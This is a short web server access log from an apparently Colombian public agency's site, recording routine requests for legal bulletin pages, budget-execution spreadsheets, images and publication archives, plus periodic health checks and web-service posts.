172.22.2.4 - - [28/Aug/2022:15:53:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
64.124.8.57 - - [28/Aug/2022:15:56:01 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones HTTP/1.1" 301 290
207.46.13.115 - - [28/Aug/2022:15:56:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=ke6wi7olt62kffpb-h7ukqiu.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
64.124.8.57 - - [28/Aug/2022:15:56:12 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Historico/EJECUCION%20%20VIGENCIA%20DICIEMBRE%202018%20.xlsx HTTP/1.1" 200 33067
201.245.192.253 - - [28/Aug/2022:15:56:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.16 - - [28/Aug/2022:15:56:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=ke6wi7olt62kffpb-h7ukqiu.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
216.245.221.92 - - [28/Aug/2022:15:56:46 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.57 - - [28/Aug/2022:15:57:22 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/4.%20EJECUCION%20DE%20RESERVAS%20ABRIL%202022.xlsx HTTP/1.1" 200 28626
173.252.95.118 - - [28/Aug/2022:15:58:42 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
173.252.79.24 - - [28/Aug/2022:16:00:21 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
64.124.8.57 - - [28/Aug/2022:16:00:35 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Historico HTTP/1.1" 301 290
172.22.2.4 - - [28/Aug/2022:15:58:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:16:01:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:15:59:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
5.45.207.140 - - [28/Aug/2022:16:01:31 -0500] "-" 408 -
216.245.221.92 - - [28/Aug/2022:16:01:46 -0500] "HEAD / HTTP/1.1" 200 -
191.95.60.62 - - [28/Aug/2022:15:59:08 -0500] "GET /Publicaciones/SSFFS-05831.zip HTTP/1.1" 200 58416359
172.22.2.4 - - [28/Aug/2022:16:02:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [28/Aug/2022:16:03:02 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [28/Aug/2022:16:03:09 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [28/Aug/2022:16:03:18 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
172.22.2.4 - - [28/Aug/2022:16:03:18 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
64.124.8.57 - - [28/Aug/2022:16:03:22 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Historico/EJECUCION%20%20VIGENCIA%20DICIEMBRE%202017.xlsx HTTP/1.1" 200 35079
172.22.2.4 - - [28/Aug/2022:16:03:25 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [28/Aug/2022:16:03:33 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [28/Aug/2022:16:03:33 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [28/Aug/2022:16:03:33 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [28/Aug/2022:16:03:33 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
64.124.8.57 - - [28/Aug/2022:16:03:48 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/1.%20EJECUCION%20DE%20VIGENCIAS%20ENERO%202022.xlsx HTTP/1.1" 200 92995
172.22.2.4 - - [28/Aug/2022:16:03:25 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 40907
64.124.8.57 - - [28/Aug/2022:16:04:30 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Historico/EJECUCION%20RESERVAS%20DICIEMBRE%202018%20.xlsx HTTP/1.1" 200 17276
201.245.192.253 - - [28/Aug/2022:16:06:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:16:04:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Aug/2022:16:06:46 -0500] "HEAD / HTTP/1.1" 200 -
191.95.60.62 - - [28/Aug/2022:16:06:49 -0500] "GET /Publicaciones/SSFFS-05832.zip HTTP/1.1" 200 6279599
172.22.2.4 - - [28/Aug/2022:16:05:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
64.124.8.57 - - [28/Aug/2022:16:07:43 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/1.%20EJECUCION%20DE%20RESERVAS%20ENERO%202022.xlsx HTTP/1.1" 200 27172
173.252.83.13 - - [28/Aug/2022:16:08:04 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
191.95.60.62 - - [28/Aug/2022:16:09:40 -0500] "GET /Publicaciones/SSFFS-05833.zip HTTP/1.1" 200 7819636
201.245.192.253 - - [28/Aug/2022:16:11:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
5.45.207.150 - - [28/Aug/2022:16:11:31 -0500] "-" 408 -
216.245.221.92 - - [28/Aug/2022:16:11:46 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:16:10:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:16:11:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
64.124.8.57 - - [28/Aug/2022:16:13:46 -0500] "GET /transparencia/financiera/Ejecucion%20Presupuestal/Vigencia%20actual/2.%20EJECUCION%20DE%20VIGENCIAS%20FEBRERO%202022.xlsx HTTP/1.1" 200 188086
172.22.2.4 - - [28/Aug/2022:16:14:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [28/Aug/2022:16:16:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.95.60.62 - - [28/Aug/2022:16:16:18 -0500] "GET /Publicaciones/SSFFS-05835.zip HTTP/1.1" 404 227
172.22.2.4 - - [28/Aug/2022:16:14:39 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63198
191.95.60.62 - - [28/Aug/2022:16:16:22 -0500] "GET /Publicaciones/SSFFS-05835.zip HTTP/1.1" 404 227
191.95.60.62 - - [28/Aug/2022:16:16:23 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
